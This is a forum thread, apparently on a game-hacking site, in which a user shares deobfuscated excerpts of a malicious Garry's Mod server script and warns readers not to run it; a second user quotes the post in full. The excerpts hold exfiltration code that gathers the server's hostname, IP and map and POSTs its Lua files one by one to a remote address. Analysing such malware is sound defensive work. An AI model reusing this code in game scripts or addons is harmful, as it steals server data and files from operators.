Results 1 to 15 of 15

Hybrid View

  1. #1
    NWILL-Helix's Avatar
    Join Date
    Dec 2018
    Gender
    male
    Posts
    1
    Reputation
    10
    Thanks
    0

    Post I did a better job deobfuscating than suchisgood ;)

    I know this is an old thread but the answers in here were a little disappointing. I deobfuscated the code and it looks to be a serverside script that sends the hostname, IP address, current map, and your Lua files to 192.168.1.33:5535. This is a local IP address so you should check your network for malware...
    Code:
    local crepeat = "192.168.1.33"
    local andc = "https://" .. crepeat .. ":5535"
    Code:
    local drepeat = util.TableToJSON({
    	hostname = GetHostName(),
    	ip = game.GetIPAddress(),
    	map = game.GetMap()
    })
    Code:
    HTTP({
    	url = andc,
    	method = "POST",
    	body = endb,
    	headers = {
    		["Content-Type"] = "text/plain",
    		filePath = don,
    		files_cur = tostring(jrepeat),
    		files_max = tostring(ink)
    	},
    	type = "text/plain",
    	success = function()
    		jrepeat = jrepeat+1
    		if jrepeat <= ink then
    			areturn.sendFile(continuem[jrepeat])
    		end
    	end,
    	failed = print
    })
    I've attached the full deobfuscated script to this post. Don't run it.
    <b>Downloadable Files</b> Downloadable Files

  2. #2
    T-800's Avatar
    Join Date
    Aug 2014
    Gender
    male
    Location
    Romania
    Posts
    17,065
    Reputation
    1688
    Thanks
    84,851
    Quote Originally Posted by NWILL-Helix View Post
    I know this is an old thread but the answers in here were a little disappointing. I deobfuscated the code and it looks to be a serverside script that sends the hostname, IP address, current map, and your Lua files to 192.168.1.33:5535. This is a local IP address so you should check your network for malware...
    Code:
    local crepeat = "192.168.1.33"
    local andc = "https://" .. crepeat .. ":5535"
    Code:
    local drepeat = util.TableToJSON({
    	hostname = GetHostName(),
    	ip = game.GetIPAddress(),
    	map = game.GetMap()
    })
    Code:
    HTTP({
    	url = andc,
    	method = "POST",
    	body = endb,
    	headers = {
    		["Content-Type"] = "text/plain",
    		filePath = don,
    		files_cur = tostring(jrepeat),
    		files_max = tostring(ink)
    	},
    	type = "text/plain",
    	success = function()
    		jrepeat = jrepeat+1
    		if jrepeat <= ink then
    			areturn.sendFile(continuem[jrepeat])
    		end
    	end,
    	failed = print
    })
    I've attached the full deobfuscated script to this post. Don't run it.
    Thanks for sharing

    "Never stop being a good person because of bad people"


    Super User -> 15-7-2020
    Global Moderator -> 23-3-2019 - 15-7-2020
    Steam Moderator -> 12-12-2017 - 23-3-2019
    Steam Minion+ -> 09-04-2017 - 12-12-2017
    Steam Minion -> 03-01-2017 - 09-04-2017


Similar Threads

  1. [Help Request] Need Help With Putting A Hack Code Into A Game
    By Boy11 in forum Garry's Mod Discussions & Help
    Replies: 3
    Last Post: 02-20-2017, 05:24 PM
  2. [Help Request] Help With Black Ops 3 Code
    By Jakob2015 in forum C++/C Programming
    Replies: 9
    Last Post: 09-04-2016, 03:45 PM
  3. [Help Request] Need help finding a certain source code to add to my .swf
    By pingaspingaspingas in forum Realm of the Mad God Help & Requests
    Replies: 4
    Last Post: 06-30-2013, 07:23 PM
  4. Need help with my warrock hack code
    By dikketr0l in forum Visual Basic Programming
    Replies: 6
    Last Post: 08-04-2007, 06:36 AM
  5. help to make a promo code generator
    By rebell07 in forum WarRock - International Hacks
    Replies: 1
    Last Post: 07-11-2007, 04:44 PM